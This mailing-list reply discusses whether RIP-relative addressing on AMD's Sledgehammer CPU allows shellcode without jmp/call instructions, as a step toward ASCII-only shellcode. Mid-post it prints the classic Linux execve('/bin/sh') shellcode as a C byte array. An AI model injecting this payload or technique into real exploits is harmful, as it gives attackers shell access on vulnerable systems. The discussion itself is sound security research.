Re: AMD Sledgehammer and ascii-only shellcode

[Holger van Koll <holger () VANKOLL DE>]

Holger van Koll wrote:
> Hi,
>
> the new AMD cpu has the feature to access data relatively to the
> instruction pointer.
...

> AFAIK it´s still considered impossible to code shellcode using only
> ascii-data as commands like jmp, call are not within this range.

Let me add something:

In the "standard-shellcode"

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

you wont have to eliminate the jmp (first command, 0xeb,0x1f) and call
(0xe8,0xdc,0xff,0xff,0xff)
commands as they are not necessary anymore. They are only used to get
the location
of the string "/bin/sh" onto the stack and as you know how many bytes
your code takes,
you also know the location relatively to the instruction pointer.